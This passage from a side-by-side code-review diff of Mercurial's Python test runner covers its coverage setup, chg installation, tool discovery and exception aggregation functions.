3533 b'"%~dp0python" "%~dp0hg" %*',
3536 )
3534 )
3537 with open(hgbat, 'wb') as f:
3535 with open(hgbat, 'wb') as f:
3538 f.write(data)
3536 f.write(data)
3539 else:
3537 else:
3540 print('WARNING: cannot fix hg.bat reference to python.exe')
3538 print('WARNING: cannot fix hg.bat reference to python.exe')
3541
3539
3542 if self.options.anycoverage:
3540 if self.options.anycoverage:
3543 custom = os.path.join(
3541 custom = os.path.join(
3544 osenvironb[b'RUNTESTDIR'], b'sitecustomize.py'
3542 osenvironb[b'RUNTESTDIR'], b'sitecustomize.py'
3545 )
3543 )
3546 target = os.path.join(self._pythondir, b'sitecustomize.py')
3544 target = os.path.join(self._pythondir, b'sitecustomize.py')
3547 vlog('# Installing coverage trigger to %s' % target)
3545 vlog('# Installing coverage trigger to %s' % target)
3548 shutil.copyfile(custom, target)
3546 shutil.copyfile(custom, target)
3549 rc = os.path.join(self._testdir, b'.coveragerc')
3547 rc = os.path.join(self._testdir, b'.coveragerc')
3550 vlog('# Installing coverage rc to %s' % rc)
3548 vlog('# Installing coverage rc to %s' % rc)
3551 osenvironb[b'COVERAGE_PROCESS_START'] = rc
3549 osenvironb[b'COVERAGE_PROCESS_START'] = rc
3552 covdir = os.path.join(self._installdir, b'..', b'coverage')
3550 covdir = os.path.join(self._installdir, b'..', b'coverage')
3553 try:
3551 try:
3554 os.mkdir(covdir)
3552 os.mkdir(covdir)
3555 except OSError as e:
3553 except OSError as e:
3556 if e.errno != errno.EEXIST:
3554 if e.errno != errno.EEXIST:
3557 raise
3555 raise
3558
3556
3559 osenvironb[b'COVERAGE_DIR'] = covdir
3557 osenvironb[b'COVERAGE_DIR'] = covdir
3560
3558
3561 def _checkhglib(self, verb):
3559 def _checkhglib(self, verb):
3562 """Ensure that the 'mercurial' package imported by python is
3560 """Ensure that the 'mercurial' package imported by python is
3563 the one we expect it to be. If not, print a warning to stderr."""
3561 the one we expect it to be. If not, print a warning to stderr."""
3564 if (self._bindir == self._pythondir) and (
3562 if (self._bindir == self._pythondir) and (
3565 self._bindir != self._tmpbindir
3563 self._bindir != self._tmpbindir
3566 ):
3564 ):
3567 # The pythondir has been inferred from --with-hg flag.
3565 # The pythondir has been inferred from --with-hg flag.
3568 # We cannot expect anything sensible here.
3566 # We cannot expect anything sensible here.
3569 return
3567 return
3570 expecthg = os.path.join(self._pythondir, b'mercurial')
3568 expecthg = os.path.join(self._pythondir, b'mercurial')
3571 actualhg = self._gethgpath()
3569 actualhg = self._gethgpath()
3572 if os.path.abspath(actualhg) != os.path.abspath(expecthg):
3570 if os.path.abspath(actualhg) != os.path.abspath(expecthg):
3573 sys.stderr.write(
3571 sys.stderr.write(
3574 'warning: %s with unexpected mercurial lib: %s\n'
3572 'warning: %s with unexpected mercurial lib: %s\n'
3575 ' (expected %s)\n' % (verb, actualhg, expecthg)
3573 ' (expected %s)\n' % (verb, actualhg, expecthg)
3576 )
3574 )
3577
3575
3578 def _gethgpath(self):
3576 def _gethgpath(self):
3579 """Return the path to the mercurial package that is actually found by
3577 """Return the path to the mercurial package that is actually found by
3580 the current Python interpreter."""
3578 the current Python interpreter."""
3581 if self._hgpath is not None:
3579 if self._hgpath is not None:
3582 return self._hgpath
3580 return self._hgpath
3583
3581
3584 cmd = b'"%s" -c "import mercurial; print (mercurial.__path__[0])"'
3582 cmd = b'"%s" -c "import mercurial; print (mercurial.__path__[0])"'
3585 cmd = cmd % PYTHON
3583 cmd = cmd % PYTHON
3586 if PYTHON3:
3584 if PYTHON3:
3587 cmd = _strpath(cmd)
3585 cmd = _strpath(cmd)
3588
3586
3589 p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
3587 p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
3590 out, err = p.communicate()
3588 out, err = p.communicate()
3591
3589
3592 self._hgpath = out.strip()
3590 self._hgpath = out.strip()
3593
3591
3594 return self._hgpath
3592 return self._hgpath
3595
3593
3596 def _installchg(self):
3594 def _installchg(self):
3597 """Install chg into the test environment"""
3595 """Install chg into the test environment"""
3598 vlog('# Performing temporary installation of CHG')
3596 vlog('# Performing temporary installation of CHG')
3599 assert os.path.dirname(self._bindir) == self._installdir
3597 assert os.path.dirname(self._bindir) == self._installdir
3600 assert self._hgroot, 'must be called after _installhg()'
3598 assert self._hgroot, 'must be called after _installhg()'
3601 cmd = b'"%(make)s" clean install PREFIX="%(prefix)s"' % {
3599 cmd = b'"%(make)s" clean install PREFIX="%(prefix)s"' % {
3602 b'make': b'make', # TODO: switch by option or environment?
3600 b'make': b'make', # TODO: switch by option or environment?
3603 b'prefix': self._installdir,
3601 b'prefix': self._installdir,
3604 }
3602 }
3605 cwd = os.path.join(self._hgroot, b'contrib', b'chg')
3603 cwd = os.path.join(self._hgroot, b'contrib', b'chg')
3606 vlog("# Running", cmd)
3604 vlog("# Running", cmd)
3607 proc = subprocess.Popen(
3605 proc = subprocess.Popen(
3608 cmd,
3606 cmd,
3609 shell=True,
3607 shell=True,
3610 cwd=cwd,
3608 cwd=cwd,
3611 stdin=subprocess.PIPE,
3609 stdin=subprocess.PIPE,
3612 stdout=subprocess.PIPE,
3610 stdout=subprocess.PIPE,
3613 stderr=subprocess.STDOUT,
3611 stderr=subprocess.STDOUT,
3614 )
3612 )
3615 out, _err = proc.communicate()
3613 out, _err = proc.communicate()
3616 if proc.returncode != 0:
3614 if proc.returncode != 0:
3617 if PYTHON3:
3615 if PYTHON3:
3618 sys.stdout.buffer.write(out)
3616 sys.stdout.buffer.write(out)
3619 else:
3617 else:
3620 sys.stdout.write(out)
3618 sys.stdout.write(out)
3621 sys.exit(1)
3619 sys.exit(1)
3622
3620
3623 def _outputcoverage(self):
3621 def _outputcoverage(self):
3624 """Produce code coverage output."""
3622 """Produce code coverage output."""
3625 import coverage
3623 import coverage
3626
3624
3627 coverage = coverage.coverage
3625 coverage = coverage.coverage
3628
3626
3629 vlog('# Producing coverage report')
3627 vlog('# Producing coverage report')
3630 # chdir is the easiest way to get short, relative paths in the
3628 # chdir is the easiest way to get short, relative paths in the
3631 # output.
3629 # output.
3632 os.chdir(self._hgroot)
3630 os.chdir(self._hgroot)
3633 covdir = os.path.join(_strpath(self._installdir), '..', 'coverage')
3631 covdir = os.path.join(_strpath(self._installdir), '..', 'coverage')
3634 cov = coverage(data_file=os.path.join(covdir, 'cov'))
3632 cov = coverage(data_file=os.path.join(covdir, 'cov'))
3635
3633
3636 # Map install directory paths back to source directory.
3634 # Map install directory paths back to source directory.
3637 cov.config.paths['srcdir'] = ['.', _strpath(self._pythondir)]
3635 cov.config.paths['srcdir'] = ['.', _strpath(self._pythondir)]
3638
3636
3639 cov.combine()
3637 cov.combine()
3640
3638
3641 omit = [
3639 omit = [
3642 _strpath(os.path.join(x, b'*'))
3640 _strpath(os.path.join(x, b'*'))
3643 for x in [self._bindir, self._testdir]
3641 for x in [self._bindir, self._testdir]
3644 ]
3642 ]
3645 cov.report(ignore_errors=True, omit=omit)
3643 cov.report(ignore_errors=True, omit=omit)
3646
3644
3647 if self.options.htmlcov:
3645 if self.options.htmlcov:
3648 htmldir = os.path.join(_strpath(self._outputdir), 'htmlcov')
3646 htmldir = os.path.join(_strpath(self._outputdir), 'htmlcov')
3649 cov.html_report(directory=htmldir, omit=omit)
3647 cov.html_report(directory=htmldir, omit=omit)
3650 if self.options.annotate:
3648 if self.options.annotate:
3651 adir = os.path.join(_strpath(self._outputdir), 'annotated')
3649 adir = os.path.join(_strpath(self._outputdir), 'annotated')
3652 if not os.path.isdir(adir):
3650 if not os.path.isdir(adir):
3653 os.mkdir(adir)
3651 os.mkdir(adir)
3654 cov.annotate(directory=adir, omit=omit)
3652 cov.annotate(directory=adir, omit=omit)
3655
3653
3656 def _findprogram(self, program):
3654 def _findprogram(self, program):
3657 """Search PATH for a executable program"""
3655 """Search PATH for a executable program"""
3658 dpb = _bytespath(os.defpath)
3656 dpb = _bytespath(os.defpath)
3659 sepb = _bytespath(os.pathsep)
3657 sepb = _bytespath(os.pathsep)
3660 for p in osenvironb.get(b'PATH', dpb).split(sepb):
3658 for p in osenvironb.get(b'PATH', dpb).split(sepb):
3661 name = os.path.join(p, program)
3659 name = os.path.join(p, program)
3662 if os.name == 'nt' or os.access(name, os.X_OK):
3660 if os.name == 'nt' or os.access(name, os.X_OK):
3663 return name
3661 return name
3664 return None
3662 return None
3665
3663
3666 def _checktools(self):
3664 def _checktools(self):
3667 """Ensure tools required to run tests are present."""
3665 """Ensure tools required to run tests are present."""
3668 for p in self.REQUIREDTOOLS:
3666 for p in self.REQUIREDTOOLS:
3669 if os.name == 'nt' and not p.endswith(b'.exe'):
3667 if os.name == 'nt' and not p.endswith(b'.exe'):
3670 p += b'.exe'
3668 p += b'.exe'
3671 found = self._findprogram(p)
3669 found = self._findprogram(p)
3672 p = p.decode("utf-8")
3670 p = p.decode("utf-8")
3673 if found:
3671 if found:
3674 vlog("# Found prerequisite", p, "at", _strpath(found))
3672 vlog("# Found prerequisite", p, "at", _strpath(found))
3675 else:
3673 else:
3676 print("WARNING: Did not find prerequisite tool: %s " % p)
3674 print("WARNING: Did not find prerequisite tool: %s " % p)
3677
3675
3678
3676
3679 def aggregateexceptions(path):
3677 def aggregateexceptions(path):
3680 exceptioncounts = collections.Counter()
3678 exceptioncounts = collections.Counter()
3681 testsbyfailure = collections.defaultdict(set)
3679 testsbyfailure = collections.defaultdict(set)
3682 failuresbytest = collections.defaultdict(set)
3680 failuresbytest = collections.defaultdict(set)
3683
3681
3684 for f in os.listdir(path):
3682 for f in os.listdir(path):
3685 with open(os.path.join(path, f), 'rb') as fh:
3683 with open(os.path.join(path, f), 'rb') as fh:
3686 data = fh.read().split(b'\0')
3684 data = fh.read().split(b'\0')
3687 if len(data) != 5:
3685 if len(data) != 5:
3688 continue
3686 continue
3689
3687
3690 exc, mainframe, hgframe, hgline, testname = data
3688 exc, mainframe, hgframe, hgline, testname = data
3691 exc = exc.decode('utf-8')
3689 exc = exc.decode('utf-8')
3692 mainframe = mainframe.decode('utf-8')
3690 mainframe = mainframe.decode('utf-8')
3693 hgframe = hgframe.decode('utf-8')
3691 hgframe = hgframe.decode('utf-8')
3694 hgline = hgline.decode('utf-8')
3692 hgline = hgline.decode('utf-8')
3695 testname = testname.decode('utf-8')
3693 testname = testname.decode('utf-8')
3696
3694
3697 key = (hgframe, hgline, exc)
3695 key = (hgframe, hgline, exc)
3698 exceptioncounts[key] += 1
3696 exceptioncounts[key] += 1
3699 testsbyfailure[key].add(testname)
3697 testsbyfailure[key].add(testname)
3700 failuresbytest[testname].add(key)
3698 failuresbytest[testname].add(key)
3701
3699
3702 # Find test having fewest failures for each failure.
3700 # Find test having fewest failures for each failure.
3703 leastfailing = {}
3701 leastfailing = {}
3704 for key, tests in testsbyfailure.items():
3702 for key, tests in testsbyfailure.items():
3705 fewesttest = None
3703 fewesttest = None
3706 fewestcount = 99999999
3704 fewestcount = 99999999
3707 for test in sorted(tests):
3705 for test in sorted(tests):
3708 if len(failuresbytest[test]) < fewestcount:
3706 if len(failuresbytest[test]) < fewestcount:
3709 fewesttest = test
3707 fewesttest = test
3710 fewestcount = len(failuresbytest[test])
3708 fewestcount = len(failuresbytest[test])
3711
3709
3712 leastfailing[key] = (fewestcount, fewesttest)
3710 leastfailing[key] = (fewestcount, fewesttest)
3713
3711
3714 # Create a combined counter so we can sort by total occurrences and
3712 # Create a combined counter so we can sort by total occurrences and
3715 # impacted tests.
3713 # impacted tests.
3716 combined = {}
3714 combined = {}
3717 for key in exceptioncounts:
3715 for key in exceptioncounts:
3718 combined[key] = (
3716 combined[key] = (
3719 exceptioncounts[key],
3717 exceptioncounts[key],
3720 len(testsbyfailure[key]),
3718 len(testsbyfailure[key]),
3721 leastfailing[key][0],
3719 leastfailing[key][0],
3722 leastfailing[key][1],
3720 leastfailing[key][1],
3723 )
3721 )
3724
3722
3725 return {
3723 return {
3726 'exceptioncounts': exceptioncounts,
3724 'exceptioncounts': exceptioncounts,
3727 'total': sum(exceptioncounts.values()),
3725 'total': sum(exceptioncounts.values()),
3728 'combined': combined,
3726 'combined': combined,
3729 'leastfailing': leastfailing,
3727 'leastfailing': leastfailing,
3730 'byfailure': testsbyfailure,
3728 'byfailure': testsbyfailure,
3731 'bytest': failuresbytest,
3729 'bytest': failuresbytest,
3732 }
3730 }
3733
3731
3734
3732
3735 if __name__ == '__main__':
3733 if __name__ == '__main__':
3736 runner = TestRunner()
3734 runner = TestRunner()
3737
3735
3738 try:
3736 try:
3739 import msvcrt
3737 import msvcrt
3740
3738
3741 msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
3739 msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
3742 msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
3740 msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
3743 msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
3741 msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
3744 except ImportError:
3742 except ImportError:
3745 pass
3743 pass
3746
3744
3747 sys.exit(runner.run(sys.argv[1:]))
3745 sys.exit(runner.run(sys.argv[1:]))
General Comments 0
You need to be logged in to leave comments. Login now